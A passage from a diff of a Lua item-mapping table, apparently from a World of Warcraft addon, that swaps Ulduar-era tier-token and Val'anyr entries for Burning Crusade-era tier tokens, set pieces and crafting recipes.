Circle - ["45614"] = { - 46053, -- Reply-Code Alpha + -- Handwraps of the Incarnate + ["29055"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Sunglimmer Cloak - ["45618"] = { - 46053, -- Reply-Code Alpha + -- Shroud of the Incarnate + ["29056"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Breastplate of the Wayward Conqueror - ["45632"] = { - 46137, -- Conqueror's Deathbringer Robe - 46154, -- Conqueror's Aegis Battleplate - 46168, -- Conqueror's Raiments of Sanctification - 46173, -- Conqueror's Aegis Breastplate - 46178, -- Conqueror's Aegis Tunic - 46193, -- Conqueror's Robe of Sanctification + -- Gloves of the Incarnate + ["29057"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Breastplate of the Wayward Protector - ["45633"] = { - 46141, -- Conqueror's Scourgestalker Tunic - 46146, -- Conqueror's Siegebreaker Battleplate - 46162, -- Conqueror's Siegebreaker Breastplate - 46198, -- Conqueror's Worldbreaker Tunic - 46205, -- Conqueror's Worldbreaker Chestguard - 46206, -- Conqueror's Worldbreaker Hauberk + -- Soul-Collar of the Incarnate + ["29058"] = { + 29761, -- Helm of the Fallen Defender }, - -- Breastplate of the Wayward Vanquisher - ["45634"] = { - 46111, -- Conqueror's Darkruned Battleplate - 46118, -- Conqueror's Darkruned Chestguard - 46123, -- Conqueror's Terrorblade Breastplate - 46130, -- Conqueror's Kirin Tor Tunic - 46159, -- Conqueror's Nightsong Raiments - 46186, -- Conqueror's Nightsong Robe - 46194, -- Conqueror's Nightsong Vestments + -- Leggings of the Incarnate + ["29059"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Chestguard of the Wayward Conqueror - ["45635"] = { - 45374, -- Valorous Aegis Tunic - 45375, -- Valorous Aegis Battleplate - 45381, -- Valorous Aegis Breastplate - 45389, -- Valorous Robe of Sanctification - 45395, -- Valorous Raiments of Sanctification - 45421, -- Valorous Deathbringer Robe + -- Soul-Mantle of the Incarnate + ["29060"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Chestguard of the Wayward Protector - ["45636"] = { - 45364, -- Valorous Scourgestalker Tunic - 45405, -- Valorous Worldbreaker Tunic - 45411, -- Valorous Worldbreaker Hauberk - 45413, -- Valorous Worldbreaker Chestguard - 45424, -- Valorous Siegebreaker Breastplate - 45429, -- Valorous Siegebreaker Battleplate + -- Justicar Diadem + ["29061"] = { + 29760, -- Helm of the Fallen Champion }, - -- Chestguard of the Wayward Vanquisher - ["45637"] = { - 45335, -- Valorous Darkruned Chestguard - 45340, -- Valorous Darkruned Battleplate - 45348, -- Valorous Nightsong Robe - 45354, -- Valorous Nightsong Vestments - 45358, -- Valorous Nightsong Raiments - 45368, -- Valorous Kirin Tor Tunic - 45396, -- Valorous Terrorblade Breastplate + -- Justicar Chestpiece + ["29062"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Crown of the Wayward Conqueror - ["45638"] = { - 46140, -- Conqueror's Deathbringer Hood - 46156, -- Conqueror's Aegis Helm - 46172, -- Conqueror's Circlet of Sanctification - 46175, -- Conqueror's Aegis Faceguard - 46180, -- Conqueror's Aegis Headpiece - 46197, -- Conqueror's Cowl of Sanctification + -- Justicar Leggings + ["29063"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Crown of the Wayward Protector - ["45639"] = { - 46143, -- Conqueror's Scourgestalker Headpiece - 46151, -- Conqueror's Siegebreaker Helmet - 46166, -- Conqueror's Siegebreaker Greathelm - 46201, -- Conqueror's Worldbreaker Headpiece - 46209, -- Conqueror's Worldbreaker Helm - 46212, -- Conqueror's Worldbreaker Faceguard + -- Justicar Pauldrons + ["29064"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Crown of the Wayward Vanquisher - ["45640"] = { - 46115, -- Conqueror's Darkruned Helmet - 46120, -- Conqueror's Darkruned Faceguard - 46125, -- Conqueror's Terrorblade Helmet - 46129, -- Conqueror's Kirin Tor Hood - 46161, -- Conqueror's Nightsong Headguard - 46184, -- Conqueror's Nightsong Headpiece - 46191, -- Conqueror's Nightsong Cover + -- Justicar Gloves + ["29065"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Gauntlets of the Wayward Conqueror - ["45641"] = { - 46135, -- Conqueror's Deathbringer Gloves - 46155, -- Conqueror's Aegis Gauntlets - 46163, -- Conqueror's Handwraps of Sanctification - 46174, -- Conqueror's Aegis Handguards - 46179, -- Conqueror's Aegis Gloves - 46188, -- Conqueror's Gloves of Sanctification + -- Justicar Chestguard + ["29066"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Gauntlets of the Wayward Protector - ["45642"] = { - 46142, -- Conqueror's Scourgestalker Handguards - 46148, -- Conqueror's Siegebreaker Gauntlets - 46164, -- Conqueror's Siegebreaker Handguards - 46199, -- Conqueror's Worldbreaker Handguards - 46200, -- Conqueror's Worldbreaker Grips - 46207, -- Conqueror's Worldbreaker Gloves + -- Justicar Handguards + ["29067"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Gauntlets of the Wayward Vanquisher - ["45643"] = { - 46113, -- Conqueror's Darkruned Gauntlets - 46119, -- Conqueror's Darkruned Handguards - 46124, -- Conqueror's Terrorblade Gauntlets - 46132, -- Conqueror's Kirin Tor Gauntlets - 46158, -- Conqueror's Nightsong Handgrips - 46183, -- Conqueror's Nightsong Handguards - 46189, -- Conqueror's Nightsong Gloves + -- Justicar Faceguard + ["29068"] = { + 29760, -- Helm of the Fallen Champion }, - -- Gloves of the Wayward Conqueror - ["45644"] = { - 45370, -- Valorous Aegis Gloves - 45376, -- Valorous Aegis Gauntlets - 45383, -- Valorous Aegis Handguards - 45387, -- Valorous Gloves of Sanctification - 45392, -- Valorous Handwraps of Sanctification - 45419, -- Valorous Deathbringer Gloves + -- Justicar Legguards + ["29069"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Gloves of the Wayward Protector - ["45645"] = { - 45360, -- Valorous Scourgestalker Handguards - 45401, -- Valorous Worldbreaker Handguards - 45406, -- Valorous Worldbreaker Gloves - 45414, -- Valorous Worldbreaker Grips - 45426, -- Valorous Siegebreaker Handguards - 45430, -- Valorous Siegebreaker Gauntlets + -- Justicar Shoulderguards + ["29070"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Gloves of the Wayward Vanquisher - ["45646"] = { - 45337, -- Valorous Darkruned Handguards - 45341, -- Valorous Darkruned Gauntlets - 45345, -- Valorous Nightsong Handguards - 45351, -- Valorous Nightsong Gloves - 45355, -- Valorous Nightsong Handgrips - 45397, -- Valorous Terrorblade Gauntlets - 46131, -- Valorous Kirin Tor Gauntlets + -- Justicar Breastplate + ["29071"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Helm of the Wayward Conqueror - ["45647"] = { - 45372, -- Valorous Aegis Headpiece - 45377, -- Valorous Aegis Helm - 45382, -- Valorous Aegis Faceguard - 45386, -- Valorous Cowl of Sanctification - 45391, -- Valorous Circlet of Sanctification - 45417, -- Valorous Deathbringer Hood + -- Justicar Gauntlets + ["29072"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Helm of the Wayward Protector - ["45648"] = { - 45361, -- Valorous Scourgestalker Headpiece - 45402, -- Valorous Worldbreaker Headpiece - 45408, -- Valorous Worldbreaker Helm - 45412, -- Valorous Worldbreaker Faceguard - 45425, -- Valorous Siegebreaker Greathelm - 45431, -- Valorous Siegebreaker Helmet + -- Justicar Crown + ["29073"] = { + 29760, -- Helm of the Fallen Champion }, - -- Helm of the Wayward Vanquisher - ["45649"] = { - 45336, -- Valorous Darkruned Faceguard - 45342, -- Valorous Darkruned Helmet - 45346, -- Valorous Nightsong Headpiece - 45356, -- Valorous Nightsong Headguard - 45365, -- Valorous Kirin Tor Hood - 45398, -- Valorous Terrorblade Helmet - 46313, -- Valorous Nightsong Cover + -- Justicar Greaves + ["29074"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Leggings of the Wayward Conqueror - ["45650"] = { - 45371, -- Valorous Aegis Greaves - 45379, -- Valorous Aegis Legplates - 45384, -- Valorous Aegis Legguards - 45388, -- Valorous Leggings of Sanctification - 45394, -- Valorous Pants of Sanctification - 45420, -- Valorous Deathbringer Leggings + -- Justicar Shoulderplates + ["29075"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Leggings of the Wayward Protector - ["45651"] = { - 45362, -- Valorous Scourgestalker Legguards - 45403, -- Valorous Worldbreaker Legguards - 45409, -- Valorous Worldbreaker Kilt - 45416, -- Valorous Worldbreaker War-Kilt - 45427, -- Valorous Siegebreaker Legguards - 45432, -- Valorous Siegebreaker Legplates + -- Collar of the Aldor + ["29076"] = { + 29759, -- Helm of the Fallen Hero }, - -- Leggings of the Wayward Vanquisher - ["45652"] = { - 45338, -- Valorous Darkruned Legguards - 45343, -- Valorous Darkruned Legplates - 45347, -- Valorous Nightsong Leggings - 45353, -- Valorous Nightsong Trousers - 45357, -- Valorous Nightsong Legguards - 45367, -- Valorous Kirin Tor Leggings - 45399, -- Valorous Terrorblade Legplates + -- Vestments of the Aldor + ["29077"] = { + 29755, -- Chestguard of the Fallen Hero }, - -- Legplates of the Wayward Conqueror - ["45653"] = { - 46139, -- Conqueror's Deathbringer Leggings - 46153, -- Conqueror's Aegis Legplates - 46170, -- Conqueror's Pants of Sanctification - 46176, -- Conqueror's Aegis Legguards - 46181, -- Conqueror's Aegis Greaves - 46195, -- Conqueror's Leggings of Sanctification + -- Legwraps of the Aldor + ["29078"] = { + 29765, -- Leggings of the Fallen Hero }, - -- Legplates of the Wayward Protector - ["45654"] = { - 46144, -- Conqueror's Scourgestalker Legguards - 46150, -- Conqueror's Siegebreaker Legplates - 46169, -- Conqueror's Siegebreaker Legguards - 46202, -- Conqueror's Worldbreaker Legguards - 46208, -- Conqueror's Worldbreaker War-Kilt - 46210, -- Conqueror's Worldbreaker Kilt + -- Pauldrons of the Aldor + ["29079"] = { + 29762, -- Pauldrons of the Fallen Hero }, - -- Legplates of the Wayward Vanquisher - ["45655"] = { - 46116, -- Conqueror's Darkruned Legplates - 46121, -- Conqueror's Darkruned Legguards - 46126, -- Conqueror's Terrorblade Legplates - 46133, -- Conqueror's Kirin Tor Leggings - 46160, -- Conqueror's Nightsong Legguards - 46185, -- Conqueror's Nightsong Leggings - 46192, -- Conqueror's Nightsong Trousers + -- Gloves of the Aldor + ["29080"] = { + 29756, -- Gloves of the Fallen Hero }, - -- Mantle of the Wayward Conqueror - ["45656"] = { - 46136, -- Conqueror's Deathbringer Shoulderpads - 46152, -- Conqueror's Aegis Shoulderplates - 46165, -- Conqueror's Mantle of Sanctification - 46177, -- Conqueror's Aegis Shoulderguards - 46182, -- Conqueror's Aegis Spaulders - 46190, -- Conqueror's Shoulderpads of Sanctification + -- Demon Stalker Greathelm + ["29081"] = { + 29759, -- Helm of the Fallen Hero }, - -- Mantle of the Wayward Protector - ["45657"] = { - 46145, -- Conqueror's Scourgestalker Spaulders - 46149, -- Conqueror's Siegebreaker Shoulderplates - 46167, -- Conqueror's Siegebreaker Pauldrons - 46203, -- Conqueror's Worldbreaker Shoulderguards - 46204, -- Conqueror's Worldbreaker Spaulders - 46211, -- Conqueror's Worldbreaker Shoulderpads + -- Demon Stalker Harness + ["29082"] = { + 29755, -- Chestguard of the Fallen Hero }, - -- Mantle of the Wayward Vanquisher - ["45658"] = { - 46117, -- Conqueror's Darkruned Shoulderplates - 46122, -- Conqueror's Darkruned Pauldrons - 46127, -- Conqueror's Terrorblade Pauldrons - 46134, -- Conqueror's Kirin Tor Shoulderpads - 46157, -- Conqueror's Nightsong Shoulderpads - 46187, -- Conqueror's Nightsong Spaulders - 46196, -- Conqueror's Nightsong Mantle + -- Demon Stalker Greaves + ["29083"] = { + 29765, -- Leggings of the Fallen Hero }, - -- Spaulders of the Wayward Conqueror - ["45659"] = { - 45373, -- Valorous Aegis Spaulders - 45380, -- Valorous Aegis Shoulderplates - 45385, -- Valorous Aegis Shoulderguards - 45390, -- Valorous Shoulderpads of Sanctification - 45393, -- Valorous Mantle of Sanctification - 45422, -- Valorous Deathbringer Shoulderpads - }, - -- Spaulders of the Wayward Protector - ["45660"] = { - 45363, -- Valorous Scourgestalker Spaulders - 45404, -- Valorous Worldbreaker Spaulders - 45410, -- Valorous Worldbreaker Shoulderpads - 45415, -- Valorous Worldbreaker Shoulderguards - 45428, -- Valorous Siegebreaker Pauldrons - 45433, -- Valorous Siegebreaker Shoulderplates + -- Demon Stalker Shoulderguards + ["29084"] = { + 29762, -- Pauldrons of the Fallen Hero }, - -- Spaulders of the Wayward Vanquisher - ["45661"] = { - 45339, -- Valorous Darkruned Pauldrons - 45344, -- Valorous Darkruned Shoulderplates - 45349, -- Valorous Nightsong Spaulders - 45352, -- Valorous Nightsong Mantle - 45359, -- Valorous Nightsong Shoulderpads - 45369, -- Valorous Kirin Tor Shoulderpads - 45400, -- Valorous Terrorblade Pauldrons + -- Demon Stalker Gauntlets + ["29085"] = { + 29756, -- Gloves of the Fallen Hero }, - -- Unbound Fragments of Val'anyr - ["45896"] = { - 45038, -- Fragment of Val'anyr + -- Crown of Malorne + ["29086"] = { + 29761, -- Helm of the Fallen Defender }, - -- Reforged Hammer of Ancient Kings - ["45897"] = { - 45038, -- Fragment of Val'anyr + -- Chestguard of Malorne + ["29087"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Val'anyr, Hammer of Ancient Kings - ["46017"] = { - 45038, -- Fragment of Val'anyr + -- Legguards of Malorne + ["29088"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Reply-Code Alpha - ["46052"] = { - 46320, -- Drape of the Skyherald - 46321, -- Sunglimmer Drape - 46322, -- Brann's Sealing Ring - 46323, -- Starshine Signet + -- Shoulderguards of Malorne + ["29089"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Reply-Code Alpha - ["46053"] = { - 45588, -- Drape of the Skyborn - 45608, -- Brann's Signet Ring - 45614, -- Starshine Circle - 45618, -- Sunglimmer Cloak + -- Handguards of Malorne + ["29090"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Conqueror's Darkruned Battleplate - ["46111"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Chestpiece of Malorne + ["29091"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Conqueror's Darkruned Gauntlets - ["46113"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Gloves of Malorne + ["29092"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Conqueror's Darkruned Helmet - ["46115"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Antlers of Malorne + ["29093"] = { + 29761, -- Helm of the Fallen Defender }, - -- Conqueror's Darkruned Legplates - ["46116"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Britches of Malorne + ["29094"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Conqueror's Darkruned Shoulderplates - ["46117"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Pauldrons of Malorne + ["29095"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Conqueror's Darkruned Chestguard - ["46118"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Breastplate of Malorne + ["29096"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Conqueror's Darkruned Handguards - ["46119"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Gauntlets of Malorne + ["29097"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Conqueror's Darkruned Faceguard - ["46120"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Stag-Helm of Malorne + ["29098"] = { + 29761, -- Helm of the Fallen Defender }, - -- Conqueror's Darkruned Legguards - ["46121"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Greaves of Malorne + ["29099"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Conqueror's Darkruned Pauldrons - ["46122"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Mantle of Malorne + ["29100"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Conqueror's Terrorblade Breastplate - ["46123"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Chestguard of the Fallen Defender + ["29753"] = { + 29012, -- Warbringer Chestguard + 29019, -- Warbringer Breastplate + 29050, -- Robes of the Incarnate + 29056, -- Shroud of the Incarnate + 29087, -- Chestguard of Malorne + 29091, -- Chestpiece of Malorne + 29096, -- Breastplate of Malorne }, - -- Conqueror's Terrorblade Gauntlets - ["46124"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Chestguard of the Fallen Champion + ["29754"] = { + 29029, -- Cyclone Hauberk + 29033, -- Cyclone Chestguard + 29038, -- Cyclone Breastplate + 29045, -- Netherblade Chestpiece + 29062, -- Justicar Chestpiece + 29066, -- Justicar Chestguard + 29071, -- Justicar Breastplate }, - -- Conqueror's Terrorblade Helmet - ["46125"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Chestguard of the Fallen Hero + ["29755"] = { + 28964, -- Voidheart Robe + 29077, -- Vestments of the Aldor + 29082, -- Demon Stalker Harness }, - -- Conqueror's Terrorblade Legplates - ["46126"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Gloves of the Fallen Hero + ["29756"] = { + 28968, -- Voidheart Gloves + 29080, -- Gloves of the Aldor + 29085, -- Demon Stalker Gauntlets }, - -- Conqueror's Terrorblade Pauldrons - ["46127"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Gloves of the Fallen Champion + ["29757"] = { + 29032, -- Cyclone Gloves + 29034, -- Cyclone Handguards + 29039, -- Cyclone Gauntlets + 29048, -- Netherblade Gloves + 29065, -- Justicar Gloves + 29067, -- Justicar Handguards + 29072, -- Justicar Gauntlets }, - -- Conqueror's Kirin Tor Hood - ["46129"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Gloves of the Fallen Defender + ["29758"] = { + 29017, -- Warbringer Handguards + 29020, -- Warbringer Gauntlets + 29055, -- Handwraps of the Incarnate + 29057, -- Gloves of the Incarnate + 29090, -- Handguards of Malorne + 29092, -- Gloves of Malorne + 29097, -- Gauntlets of Malorne }, - -- Conqueror's Kirin Tor Tunic - ["46130"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Helm of the Fallen Hero + ["29759"] = { + 28963, -- Voidheart Crown + 29076, -- Collar of the Aldor + 29081, -- Demon Stalker Greathelm }, - -- Valorous Kirin Tor Gauntlets - ["46131"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Helm of the Fallen Champion + ["29760"] = { + 29028, -- Cyclone Headdress + 29035, -- Cyclone Faceguard + 29040, -- Cyclone Helm + 29044, -- Netherblade Facemask + 29061, -- Justicar Diadem + 29068, -- Justicar Faceguard + 29073, -- Justicar Crown }, - -- Conqueror's Kirin Tor Gauntlets - ["46132"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Helm of the Fallen Defender + ["29761"] = { + 29011, -- Warbringer Greathelm + 29021, -- Warbringer Battle-Helm + 29049, -- Light-Collar of the Incarnate + 29058, -- Soul-Collar of the Incarnate + 29086, -- Crown of Malorne + 29093, -- Antlers of Malorne + 29098, -- Stag-Helm of Malorne }, - -- Conqueror's Kirin Tor Leggings - ["46133"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Pauldrons of the Fallen Hero + ["29762"] = { + 28967, -- Voidheart Mantle + 29079, -- Pauldrons of the Aldor + 29084, -- Demon Stalker Shoulderguards }, - -- Conqueror's Kirin Tor Shoulderpads - ["46134"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Pauldrons of the Fallen Champion + ["29763"] = { + 29031, -- Cyclone Shoulderpads + 29037, -- Cyclone Shoulderguards + 29043, -- Cyclone Shoulderplates + 29047, -- Netherblade Shoulderpads + 29064, -- Justicar Pauldrons + 29070, -- Justicar Shoulderguards + 29075, -- Justicar Shoulderplates }, - -- Conqueror's Deathbringer Gloves - ["46135"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Pauldrons of the Fallen Defender + ["29764"] = { + 29016, -- Warbringer Shoulderguards + 29023, -- Warbringer Shoulderplates + 29054, -- Light-Mantle of the Incarnate + 29060, -- Soul-Mantle of the Incarnate + 29089, -- Shoulderguards of Malorne + 29095, -- Pauldrons of Malorne + 29100, -- Mantle of Malorne }, - -- Conqueror's Deathbringer Shoulderpads - ["46136"] = { - 45656, -- Mantle of the Wayward Conqueror - }, - -- Conqueror's Deathbringer Robe - ["46137"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Leggings of the Fallen Hero + ["29765"] = { + 28966, -- Voidheart Leggings + 29078, -- Legwraps of the Aldor + 29083, -- Demon Stalker Greaves }, - -- Conqueror's Deathbringer Leggings - ["46139"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Leggings of the Fallen Champion + ["29766"] = { + 29030, -- Cyclone Kilt + 29036, -- Cyclone Legguards + 29042, -- Cyclone War-Kilt + 29046, -- Netherblade Breeches + 29063, -- Justicar Leggings + 29069, -- Justicar Legguards + 29074, -- Justicar Greaves }, - -- Conqueror's Deathbringer Hood - ["46140"] = { - 45638, -- Crown of the Wayward Conqueror + -- Leggings of the Fallen Defender + ["29767"] = { + 29015, -- Warbringer Legguards + 29022, -- Warbringer Greaves + 29053, -- Trousers of the Incarnate + 29059, -- Leggings of the Incarnate + 29088, -- Legguards of Malorne + 29094, -- Britches of Malorne + 29099, -- Greaves of Malorne }, - -- Conqueror's Scourgestalker Tunic - ["46141"] = { - 45633, -- Breastplate of the Wayward Protector + -- The Darkener's Grasp + ["30007"] = { + 32405, -- Verdant Sphere }, - -- Conqueror's Scourgestalker Handguards - ["46142"] = { - 45642, -- Gauntlets of the Wayward Protector + -- The Sun King's Talisman + ["30015"] = { + 32405, -- Verdant Sphere }, - -- Conqueror's Scourgestalker Headpiece - ["46143"] = { - 45639, -- Crown of the Wayward Protector + -- Telonicus's Pendant of Mayhem + ["30017"] = { + 32405, -- Verdant Sphere }, - -- Conqueror's Scourgestalker Legguards - ["46144"] = { - 45654, -- Legplates of the Wayward Protector + -- Lord Sanguinar's Claim + ["30018"] = { + 32405, -- Verdant Sphere }, - -- Conqueror's Scourgestalker Spaulders - ["46145"] = { - 45657, -- Mantle of the Wayward Protector + -- Red Havoc Boots + ["30031"] = { + 30324, -- Plans: Red Havoc Boots }, - -- Conqueror's Siegebreaker Battleplate - ["46146"] = { - 45633, -- Breastplate of the Wayward Protector + -- Red Belt of Battle + ["30032"] = { + 30322, -- Plans: Red Belt of Battle }, - -- Conqueror's Siegebreaker Gauntlets - ["46148"] = { - 45642, -- Gauntlets of the Wayward Protector + -- Boots of the Protector + ["30033"] = { + 30323, -- Plans: Boots of the Protector }, - -- Conqueror's Siegebreaker Shoulderplates - ["46149"] = { - 45657, -- Mantle of the Wayward Protector + -- Belt of the Guardian + ["30034"] = { + 30321, -- Plans: Belt of the Guardian }, - -- Conqueror's Siegebreaker Legplates - ["46150"] = { - 45654, -- Legplates of the Wayward Protector + -- Boots of the Long Road + ["30035"] = { + 30283, -- Pattern: Boots of the Long Road }, - -- Conqueror's Siegebreaker Helmet - ["46151"] = { - 45639, -- Crown of the Wayward Protector + -- Belt of the Long Road + ["30036"] = { + 30281, -- Pattern: Belt of the Long Road }, - -- Conqueror's Aegis Shoulderplates - ["46152"] = { - 45656, -- Mantle of the Wayward Conqueror + -- Boots of Blasting + ["30037"] = { + 30282, -- Pattern: Boots of Blasting }, - -- Conqueror's Aegis Legplates - ["46153"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Belt of Blasting + ["30038"] = { + 30280, -- Pattern: Belt of Blasting }, - -- Conqueror's Aegis Battleplate - ["46154"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Boots of Utter Darkness + ["30039"] = { + 30306, -- Pattern: Boots of Utter Darkness }, - -- Conqueror's Aegis Gauntlets - ["46155"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Belt of Deep Shadow + ["30040"] = { + 30302, -- Pattern: Belt of Deep Shadow }, - -- Conqueror's Aegis Helm - ["46156"] = { - 45638, -- Crown of the Wayward Conqueror + -- Boots of Natural Grace + ["30041"] = { + 30305, -- Pattern: Boots of Natural Grace }, - -- Conqueror's Nightsong Shoulderpads - ["46157"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Belt of Natural Power + ["30042"] = { + 30301, -- Pattern: Belt of Natural Power }, - -- Conqueror's Nightsong Handgrips - ["46158"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Hurricane Boots + ["30043"] = { + 30308, -- Pattern: Hurricane Boots }, - -- Conqueror's Nightsong Raiments - ["46159"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Monsoon Belt + ["30044"] = { + 30304, -- Pattern: Monsoon Belt }, - -- Conqueror's Nightsong Legguards - ["46160"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Boots of the Crimson Hawk + ["30045"] = { + 30307, -- Pattern: Boots of the Crimson Hawk }, - -- Conqueror's Nightsong Headguard - ["46161"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Belt of the Black Eagle + ["30046"] = { + 30303, -- Pattern: Belt of the Black Eagle }, - -- Conqueror's Siegebreaker Breastplate - ["46162"] = { - 45633, -- Breastplate of the Wayward Protector + -- Destroyer Chestguard + ["30113"] = { + 30237, -- Chestguard of the Vanquished Defender }, - -- Conqueror's Handwraps of Sanctification - ["46163"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Destroyer Handguards + ["30114"] = { + 30240, -- Gloves of the Vanquished Defender }, - -- Conqueror's Siegebreaker Handguards - ["46164"] = { - 45642, -- Gauntlets of the Wayward Protector + -- Destroyer Greathelm + ["30115"] = { + 30243, -- Helm of the Vanquished Defender }, - -- Conqueror's Mantle of Sanctification - ["46165"] = { - 45656, -- Mantle of the Wayward Conqueror + -- Destroyer Legguards + ["30116"] = { + 30246, -- Leggings of the Vanquished Defender }, - -- Conqueror's Siegebreaker Greathelm - ["46166"] = { - 45639, -- Crown of the Wayward Protector + -- Destroyer Shoulderguards + ["30117"] = { + 30249, -- Pauldrons of the Vanquished Defender }, - -- Conqueror's Siegebreaker Pauldrons - ["46167"] = { - 45657, -- Mantle of the Wayward Protector + -- Destroyer Breastplate + ["30118"] = { + 30237, -- Chestguard of the Vanquished Defender }, - -- Conqueror's Raiments of Sanctification - ["46168"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Destroyer Gauntlets + ["30119"] = { + 30240, -- Gloves of the Vanquished Defender }, - -- Conqueror's Siegebreaker Legguards - ["46169"] = { - 45654, -- Legplates of the Wayward Protector + -- Destroyer Battle-Helm + ["30120"] = { + 30243, -- Helm of the Vanquished Defender }, - -- Conqueror's Pants of Sanctification - ["46170"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Destroyer Greaves + ["30121"] = { + 30246, -- Leggings of the Vanquished Defender }, - -- Conqueror's Circlet of Sanctification - ["46172"] = { - 45638, -- Crown of the Wayward Conqueror + -- Destroyer Shoulderblades + ["30122"] = { + 30249, -- Pauldrons of the Vanquished Defender }, - -- Conqueror's Aegis Breastplate - ["46173"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Crystalforge Chestguard + ["30123"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Conqueror's Aegis Handguards - ["46174"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Crystalforge Handguards + ["30124"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Conqueror's Aegis Faceguard - ["46175"] = { - 45638, -- Crown of the Wayward Conqueror + -- Crystalforge Faceguard + ["30125"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Conqueror's Aegis Legguards - ["46176"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Crystalforge Legguards + ["30126"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Conqueror's Aegis Shoulderguards - ["46177"] = { - 45656, -- Mantle of the Wayward Conqueror + -- Crystalforge Shoulderguards + ["30127"] = { + 30248, -- Pauldrons of the Vanquished Champion }, - -- Conqueror's Aegis Tunic - ["46178"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Crystalforge Breastplate + ["30129"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Conqueror's Aegis Gloves - ["46179"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Crystalforge Gauntlets + ["30130"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Conqueror's Aegis Headpiece - ["46180"] = { - 45638, -- Crown of the Wayward Conqueror + -- Crystalforge War-Helm + ["30131"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Conqueror's Aegis Greaves - ["46181"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Crystalforge Greaves + ["30132"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Conqueror's Aegis Spaulders - ["46182"] = { - 45656, -- Mantle of the Wayward Conqueror + -- Crystalforge Shoulderbraces + ["30133"] = { + 30248, -- Pauldrons of the Vanquished Champion }, - -- Conqueror's Nightsong Handguards - ["46183"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Crystalforge Chestpiece + ["30134"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Conqueror's Nightsong Headpiece - ["46184"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Crystalforge Gloves + ["30135"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Conqueror's Nightsong Leggings - ["46185"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Crystalforge Greathelm + ["30136"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Conqueror's Nightsong Robe - ["46186"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Crystalforge Leggings + ["30137"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Conqueror's Nightsong Spaulders - ["46187"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Crystalforge Pauldrons + ["30138"] = { + 30248, -- 